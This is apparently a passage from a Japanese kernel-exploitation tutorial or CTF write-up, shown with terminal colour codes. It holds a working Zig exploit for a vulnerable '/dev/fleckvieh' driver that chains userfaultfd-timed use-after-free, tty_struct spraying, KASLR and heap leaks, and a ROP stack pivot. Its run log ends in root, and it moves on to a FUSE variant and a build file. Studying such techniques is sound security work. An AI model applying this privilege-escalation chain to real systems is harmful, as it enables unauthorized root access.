�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37muaf_type�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mUAF�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfaultable_pages�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mmmap�[0m�[1m�[37m(�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m3�[0m�[1m�[36m*�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mheap�[0m�[1m�[37m.�[0m�[1m�[37mpage_size_min�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m// 3 UAFs�[0m
�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mPROT�[0m�[1m�[37m.�[0m�[1m�[37mREAD�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mPROT�[0m�[1m�[37m.�[0m�[1m�[37mWRITE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mMAP�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mTYPE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mPRIVATE�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mANONYMOUS�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m1�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mmunmap�[0m�[1m�[37m(�[0m�[1m�[37mfaultable_pages�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37muserfaultfd�[0m�[1m�[37m.�[0m�[37mregister�[0m�[1m�[37m(�[0m�[1m�[37mfaultable_pages�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37msprayFaultHandler�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mttys�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mid�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37muaf_type�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mblk�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mttys�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mtty�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mtty�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mid�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mfleckvieh�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mADD�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37muaf_type�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mAAR�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// trigger a page fault and leak heap address�[0m
�[1m�[37m �[0m�[33m// when calling copy_to_user, the first few bytes are copied from the heap, and only when they are moved into `faultable_pages'�[0m
�[1m�[37m �[0m�[33m// does the UAF occur. Therefore, to ensure the bytes containing `tty_struct.ops' are not copied before copy_to_user accesses `faultable_pages', we must make a smaller request.�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mfleckvieh�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mGET�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mfaultable_pages�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m0x20�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37mid�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mptmx_fops_addr�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81c3c3c0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37mblk�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mbytesAsValue�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mfaultable_pages�[0m�[1m�[37m[�[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ops"�[0m�[1m�[37m)..][�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[37m@FieldType�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ops"�[0m�[1m�[37m))]).�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m �[0m�[1m�[37mptmx_fops_addr�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37madjust_offsets�[0m�[1m�[37m(�[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"Kernel base @ 0x{x}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[36m0xffffffff81000000�[0m�[1m�[36m+�[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mheap_leak�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mblk�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mttys�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mtty�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mtty�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mid�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mfleckvieh�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mADD�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37muaf_type�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mAAR�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mfleckvieh�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mGET�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mfaultable_pages�[0m�[1m�[37m[�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mheap�[0m�[1m�[37m.�[0m�[1m�[37mpage_size_min�[0m�[1m�[37m..][�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m1024�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37mid�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37moffset�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ldisc_sem"�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m+�[0m�[1m�[37m �[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[37m@FieldType�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ldisc_sem"�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[33m"read_wait"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37mblk�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mbytesAsValue�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mfaultable_pages�[0m�[1m�[37m[�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mheap�[0m�[1m�[37m.�[0m�[1m�[37mpage_size_min�[0m�[1m�[37m..][�[0m�[1m�[37moffset�[0m�[1m�[37m..][�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m8�[0m�[1m�[37m]).�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m �[0m�[1m�[37moffset�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"Heap leak = 0x{x}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mheap_leak�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37m@memcpy�[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m1024�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37mfaultable_pages�[0m�[1m�[37m[�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mheap�[0m�[1m�[37m.�[0m�[1m�[37mpage_size_min�[0m�[1m�[37m..][�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m1024�[0m�[1m�[37m]);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mbytesAsValue�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m.�[0m�[1m�[37mmagic�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0x5401�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m.�[0m�[1m�[37mkref�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m.�[0m�[1m�[37mdev�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m.�[0m�[1m�[37mdriver�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mheap_leak�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m.�[0m�[1m�[37mops�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mheap_leak�[0m�[1m�[36m+�[0m�[1m�[36m0x100�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// ensure ropchain is far away enough from important tty_struct internals�[0m
�[1m�[37m �[0m�[37m@memcpy�[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[36m0x100�[0m�[1m�[37m..][�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_operations�[0m�[1m�[37m)],�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mtty_operations�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mioctl�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mPUSH_RDX_CMP_EAX_0x415b005c_POP_RSP_POP_RBP�[0m�[1m�[37m �[0m�[1m�[37m}));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mropchain�[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[36m0x100�[0m�[1m�[37m..][�[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_operations�[0m�[1m�[37m)..]);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mid�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mfleckvieh�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mADD�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37muaf_type�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mAAW�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mfleckvieh�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSET�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mfaultable_pages�[0m�[1m�[37m[�[0m�[1m�[36m2�[0m�[1m�[36m*�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mheap�[0m�[1m�[37m.�[0m�[1m�[37mpage_size_min�[0m�[1m�[37m..][�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m1024�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37mid�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mttys�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mtty�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mtty�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0xdeadbeef�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mheap_leak�[0m�[1m�[36m+�[0m�[1m�[36m0x100�[0m�[1m�[36m+�[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_operations�[0m�[1m�[37m));�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mmain�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mcpu�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mcpu_set_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@splat�[0m�[1m�[37m(�[0m�[1m�[36m0�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mcpu�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m]�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37msched_setaffinity�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mgetpid�[0m�[1m�[37m(),�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mcpu�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37mcatchSigsegv�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mmodprobePath�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37msaveState�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mopen�[0m�[1m�[37m(�[0m�[33m"/dev/fleckvieh"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mRDWR�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m0o660�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mexploit�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37muser�[0m
�[1m�[37m[INFO] Beginning AAR�[0m
�[1m�[37m[INFO] Kernel base @ 0xffffffffb0800000�[0m
�[1m�[37m[INFO] Beginning AAR�[0m
�[1m�[37m[INFO] Heap leak = 0xffff9635433f4400�[0m
�[1m�[37m[INFO] Beginning AAW�[0m
�[1m�[37m[INFO] You won!!�[0m
�[1m�[37mroot�[0m
(DIR) 完全なエクスプロイト
いいね。
=== �[1m�[4mFUSE�[22m�[24m
FUSEはユーザー空間でファイルシステムを実装するものだ。
ま、僕たちの目的において重要なのはとあるファイルを開けるときに任意ハンドラーは実行する。
userfaultfdのようにまずは単純なプログラムを実装しよう。
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@import�[0m�[1m�[37m(�[0m�[33m"std"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mbuild�[0m�[1m�[37m(�[0m�[1m�[37mb�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m*�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mBuild�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mtarget�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mb�[0m�[1m�[37m.�[0m�[37mresolveTargetQuery�[0m�[1m�[37m(.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mcpu_arch�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mx86_64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mos_tag�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlinux�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mabi�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mmusl�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37moptimize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mb�[0m�[1m�[37m.�[0m�[37mstandardOptimizeOption�[0m�[1m�[37m(.{});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mexe�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mb�[0m�[1m�[37m.�[0m�[37maddExecutable�[0m�[1m�[37m(.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mname�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33m"exploit"�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mroot_source_file�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mb�[0m�[1m�[37m.�[0m�[37mpath�[0m�[1m�[37m(�[0m�[33m"main.zig"�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mtarget�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mtarget�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37moptimize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37moptimize�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlink_libc�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlinkage�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mstatic�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mexe�[0m�[1m�[37m.�[0m�[37mlinkSystemLibrary2�[0m�[1m�[37m(�[0m�[33m"fuse"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37muse_pkg_config�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37myes�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mpreferred_link_mode�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mstatic�[0m�[1m�[37m �[0m�[1m�[37m});�[0m�[1m�[37m�[0m
